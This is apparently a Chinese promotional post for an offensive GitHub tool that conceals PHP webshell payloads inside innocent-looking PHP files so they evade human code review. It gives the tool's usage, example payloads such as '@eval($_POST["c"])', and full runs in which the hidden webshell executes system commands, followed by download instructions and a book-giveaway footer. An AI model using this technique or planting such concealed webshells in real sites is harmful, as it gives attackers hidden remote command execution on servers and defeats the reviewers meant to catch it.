项目作者:Macr0phag3(公众号:橘子杀手)
项目地址:https://github.com/Macr0phag3/webshell-bypassed-human
一、过人 webshell 的生成工具
» python hide_webshell.py
usage: hide_webshell.py [-h] -pf PAYLOAD_FILE [--pro] [-wf WEBSHELL_FILE]
[--debug]
php
hide_webshell.py: error: the following arguments are required: php, -pf/--payload_file
将 payload 放在 -pf 所指定的路径
二、hide webshell
python hide_webshell.py hide_webshell.py normal.php -pf payload.txt
三、hide webshell pro
python hide_webshell.py normal_pro.php -pf payload.txt --pro
四、payload 示例
system("echo "hacked by Tr0y :)"");
@eval($_POST["c"]);
五、完整示例
» cat payload.txt
system("echo "hacked by Tr0y :)"");%
» p hide_webshell.py normal.php -pf payload.txt && php webshell_hidden.php
[in normal mode ] Hide webshell
[from payload.txt ] Get payload
Payload is system("echo "hacked by Tr0y :)"");
[from normal.php ] Get php code
[as webshell_hidden.php ] Saved webshell
[ ] All done
Bye :)
hacked by Tr0y :)
» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php webshell_hidden.php
[in pro mode ] Hide webshell
[from payload.txt ] Get payload
Payload is system("echo "hacked by Tr0y :)"");
[from normal_pro.php ] Get php code
[as webshell_hidden.php ] Saved webshell
[ ] All done
Bye :)
hacked by Tr0y :)
» cat payload.txt
@eval($_POST["c"]);%
» p hide_webshell.py normal.php -pf payload.txt && php -r '$_POST["c"]="system("id");"; require("webshell_hidden.php");'
[in normal mode ] Hide webshell
[from payload.txt ] Get payload
Payload is @eval($_POST["c"]);
[from normal.php ] Get php code
[as webshell_hidden.php ] Saved webshell
[ ] All done
Bye :)
uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略
» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php -r '$_POST["c"]="system("id");"; require("webshell_hidden.php");'
[in pro mode ] Hide webshell
[from payload.txt ] Get payload
Payload is @eval($_POST["c"]);
[from normal_pro.php ] Get php code
[as webshell_hidden.php ] Saved webshell
[ ] All done
Bye :)
uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略
六、下载地址
1、通过项目地址下载
2、公众号后台回复:20220412
好书推荐
禁止非法,后果自负
欢迎关注公众号:web安全工具库
欢迎关注视频号:之乎者也吧
加我微信(ivu123ivu),发送本篇文章的‘点赞’‘在看’及分享朋友圈的截图,
获取抽奖送书福利,仅当天有效。
所有人都可以免费参与抽奖,最后中奖者需要9.9的邮寄费
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...